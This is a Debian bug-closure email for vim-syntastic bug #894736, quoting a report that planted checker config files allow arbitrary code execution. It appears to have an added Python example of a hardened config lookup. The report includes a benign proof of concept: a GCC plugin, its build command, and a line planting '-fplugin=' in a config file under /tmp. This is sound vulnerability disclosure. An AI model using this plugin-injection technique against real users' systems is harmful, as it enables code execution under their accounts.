Your message dated Thu, 19 Apr 2018 15:56:20 +0000
with message-id <e1f9bv2-000ggc...@fasolo.debian.org>
and subject line Bug#894736: fixed in vim-syntastic 3.9.0-1
has caused the Debian Bug report #894736,
regarding Checker config files allow arbitrary code execution scenarios
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
894736: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894736
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: vim-syntastic
Version: 3.8.0-1
Severity: serious

Hello,

syntastic has a Configuration Files[1] feature enabled for several
checkers, where:

  a configuration file is looked up in the directory of the file being
  checked, then upwards in parent directories.  The search stops either
  when a file with the right name is found, or when the root of the
  filesystem is reached.[1]

[1] https://github.com/vim-syntastic/syntastic/blob/master/doc/syntastic-checkers.txt#L7744

Each line found in the configuration file is escaped as a single
argument and appended to the checker command being run.

I am not an expert on the various possibly dangerous command line
options of all possible checkers, but I played with one I knew how to
play with, and what follows is a possible attack. There might be easier
attacks on checkers that are enabled by default, since the configuration
file feature, as it is now, leaves a pretty wide attack surface open.

## Step 1: a malicious gcc plugin

The source code:

  #include <gcc-plugin.h>
  #include <stdio.h>
  
  /* GCC refuses to load a plugin that does not export this symbol. */
  int plugin_is_GPL_compatible;
  
  /* Entry point GCC calls when the plugin is loaded via -fplugin=;
   * whatever runs here runs with the privileges of the user running gcc. */
  int plugin_init(struct plugin_name_args   *info,  /* Argument info */
          struct plugin_gcc_version *ver)   /* Version of GCC */
  {
      fprintf(stdout, "hello\n");
      FILE* out = fopen("/tmp/test", "wt");
      if (out) {
          fprintf(out, "arbitrary code execution\n");
          fclose(out);
      }
      return 0;  /* 0 tells GCC the plugin initialised successfully */
  }

Building the plugin:

$ gcc -I$(gcc -print-file-name=plugin)/include -fPIC -fno-rtti -O2 -shared plugin.cc -o /tmp/plugin.so

Installing the plugin as nobody.nogroup in /tmp:

$ sudo chown nobody.nogroup /tmp/plugin.so


## Step 2: a syntastic config file

echo -fplugin=/tmp/plugin.so > /tmp/.syntastic_avrgcc_config
sudo chown nobody.nogroup /tmp/.syntastic_avrgcc_config


## Step 3: enable the avrgcc plugin

let g:syntastic_cpp_checkers = ['avrgcc']


## Step 4: edit a C++ file in /tmp

touch /tmp/foo.cc
vim /tmp/foo.cc


## Step 5: cry

$ cat /tmp/test
arbitrary code execution



# What should be different

There are several steps that can avoid this:

1. allow disabling this feature, and ship with this feature disabled by
   default
2. stop recursing upwards when hitting a directory that's writable by
   someone other than the current user
3. check that the config files are owned by the current user


# Mitigation

I am not a vimscript expert, and unfortunately I have not found a way to
disable this behaviour without editing the syntastic config files.



Enrico

-- System Information:
Debian Release: buster/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_IE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages vim-syntastic depends on:
ii  vim                2:8.0.1453-1+b1
ii  vim-addon-manager  0.5.7

vim-syntastic recommends no packages.

Versions of packages vim-syntastic suggests:
pn  checkstyle           <none>
pn  chktex               <none>
pn  closure-linter       <none>
ii  cppcheck             1.82-1
pn  foodcritic           <none>
pn  hlint                <none>
pn  lacheck              <none>
pn  libperl-critic-perl  <none>
pn  libxml2-utils        <none>
pn  pep8                 <none>
pn  puppet-lint          <none>
ii  pyflakes             1.6.0-1
pn  pylint               <none>
pn  python-flake8        <none>
pn  shellcheck           <none>
pn  sparse               <none>
pn  splint               <none>
pn  tidy                 <none>

-- no debconf information

--- End Message ---
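The two lookups side by side, as an added example that is neither part of the bug report nor syntastic's own code: find_config_unsafe reproduces the upward search quoted from the syntastic docs, and find_config_safe implements mitigations 2 and 3 from the report (stop the walk at a directory that is owned by someone else or writable by group or others, and accept only a regular config file owned by the current user and not writable by others). The function names, CONFIG_NAME, the constructed project/src tree built in demo() and the choice to treat root-owned, non-writable directories such as / or /home as trusted are this example's assumptions; it is written in Python rather than vimscript so it can be run stand-alone on any POSIX system.

```python
"""Added example (not syntastic's code): an upward config-file search with
the ownership and writability checks the report asks for, beside the
unchecked search it describes. Assumed: POSIX stat semantics; CONFIG_NAME
and the function names are this example's own."""
import os
import stat
import tempfile
from pathlib import Path
from typing import Optional

CONFIG_NAME = ".syntastic_avrgcc_config"   # name used in the report's step 2


def find_config_unsafe(start_dir, name=CONFIG_NAME) -> Optional[Path]:
    """The lookup as the report describes it: walk upward from start_dir and
    return the first file with the right name, stopping only at the root."""
    d = Path(start_dir).resolve()
    while True:
        candidate = d / name
        if candidate.is_file():
            return candidate
        if d.parent == d:          # reached the filesystem root
            return None
        d = d.parent


def _writable_by_others(st: os.stat_result) -> bool:
    # group- or world-writable: others can plant or replace files here
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_config_safe(start_dir, name=CONFIG_NAME, uid=None) -> Optional[Path]:
    """Hardened lookup: stop at the first directory that is not owned by the
    user (or root, an assumption of this example) or that others can write
    to, and only accept a regular config file owned by the user that others
    cannot write to."""
    uid = os.getuid() if uid is None else uid
    d = Path(start_dir).resolve()
    while True:
        try:
            dst = os.lstat(d)
        except OSError:
            return None
        # A directory someone else can write to (e.g. /tmp, mode 1777) is
        # exactly where the report's attacker plants the file: stop here.
        if dst.st_uid not in (uid, 0) or _writable_by_others(dst):
            return None
        candidate = d / name
        try:
            fst = os.lstat(candidate)   # lstat: do not follow a planted symlink
        except FileNotFoundError:
            fst = None
        if fst is not None:
            ok = (stat.S_ISREG(fst.st_mode)
                  and fst.st_uid == uid
                  and not _writable_by_others(fst))
            # refuse an untrusted file outright rather than keep walking upward
            return candidate if ok else None
        if d.parent == d:
            return None
        d = d.parent


def demo() -> dict:
    """Build a constructed tree project/src with a config in project/ and run
    both lookups under the conditions from the report. Returns the results."""
    base = Path(tempfile.mkdtemp())
    proj, src = base / "project", base / "project" / "src"
    src.mkdir(parents=True)
    os.chmod(proj, 0o755)
    os.chmod(src, 0o755)
    cfg = proj / CONFIG_NAME
    cfg.write_text("-Wall\n")           # a benign line, as a constructed config
    os.chmod(cfg, 0o644)
    cfg = cfg.resolve()
    out = {"cfg": cfg}
    out["unsafe_clean"] = find_config_unsafe(src)
    out["safe_clean"] = find_config_safe(src)
    # Now make project/ look like /tmp: world-writable with the sticky bit.
    os.chmod(proj, 0o1777)
    out["unsafe_worldwritable"] = find_config_unsafe(src)
    out["safe_worldwritable"] = find_config_safe(src)
    os.chmod(proj, 0o755)
    # Config owned by the user but writable by others: also refused.
    os.chmod(cfg, 0o666)
    out["safe_loosefile"] = find_config_safe(src)
    os.chmod(cfg, 0o644)
    # Pretend we are a different user: nothing in the tree is ours.
    out["safe_foreign_uid"] = find_config_safe(src, uid=os.getuid() + 1)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run as a normal user, demo() shows the report's scenario with /tmp replaced by a directory chmod 1777: the unchecked lookup still returns project/.syntastic_avrgcc_config, the checked one returns None, and it also returns None when the file itself is group/world-writable or belongs to another uid.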
--- Begin Message ---
Source: vim-syntastic
Source-Version: 3.9.0-1

We believe that the bug you reported is fixed in the latest version of
vim-syntastic, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 894...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andrea Capriotti <capri...@debian.org> (supplier of updated vim-syntastic package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 19 Apr 2018 09:38:52 +0200
Source: vim-syntastic
Binary: vim-syntastic
Architecture: source all
Version: 3.9.0-1
Distribution: unstable
Urgency: medium
Maintainer: Andrea Capriotti <capri...@debian.org>
Changed-By: Andrea Capriotti <capri...@debian.org>
Description:
 vim-syntastic - Syntax checking hacks for vim
Closes: 894736
Changes:
 vim-syntastic (3.9.0-1) unstable; urgency=medium
 .
   * New upstream release (Closes: #894736)
   * Git repository migrated to Salsa
   * Standard version bumped to 4.1.4
Checksums-Sha1:
 918fd3b0e5c966d17e1fee1de272fa0f1028a8ce 1883 vim-syntastic_3.9.0-1.dsc
 ce9a51de8d3e4542e8bfdd467d74489cdc9957e9 263275 vim-syntastic_3.9.0.orig.tar.gz
 4e360b851d081acc77bcf3f6adf9470f77872c2d 5376 vim-syntastic_3.9.0-1.debian.tar.xz
 64da9d1a0af01a2fb370fb38e59624f64083c7fa 144740 vim-syntastic_3.9.0-1_all.deb
 c3003ad2f4190b0cd1a305ae0a638dc01cf78315 5715 vim-syntastic_3.9.0-1_amd64.buildinfo
Checksums-Sha256:
 112e396966d86300c4310cc4db088e848a4a58c820fbdd26614de1c19d2a97f0 1883 vim-syntastic_3.9.0-1.dsc
 7ecaed94dc6a5b3e1f8511c94e1df9436fad1895b3337a1cd3d4e77a526c155b 263275 vim-syntastic_3.9.0.orig.tar.gz
 43a1b9dcdf9e33f51b0942fad60f8be6bd21fcecdaf75a5ce4e74edb021d0409 5376 vim-syntastic_3.9.0-1.debian.tar.xz
 b15d890a45ea852268dbd9366500710b4cef57a398885a7d1dd093f0e6d611db 144740 vim-syntastic_3.9.0-1_all.deb
 3aade8830d6056c50e4df4716e843681b8540b3f57518b0c540d216ba31c2078 5715 vim-syntastic_3.9.0-1_amd64.buildinfo
Files:
 721a969c67bdafc53480689d69dbd842 1883 editors extra vim-syntastic_3.9.0-1.dsc
 9632d807d54de03968fad8ccbe831764 263275 editors extra vim-syntastic_3.9.0.orig.tar.gz
 81dcadf07a25444d36fdf0fc40fa26cf 5376 editors extra vim-syntastic_3.9.0-1.debian.tar.xz
 9b55221101d3c1f13143fa839da00c65 144740 editors extra vim-syntastic_3.9.0-1_all.deb
 1f71dbc1b5bd1e0b2bef961b68e435af 5715 editors extra vim-syntastic_3.9.0-1_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

--- End Message ---
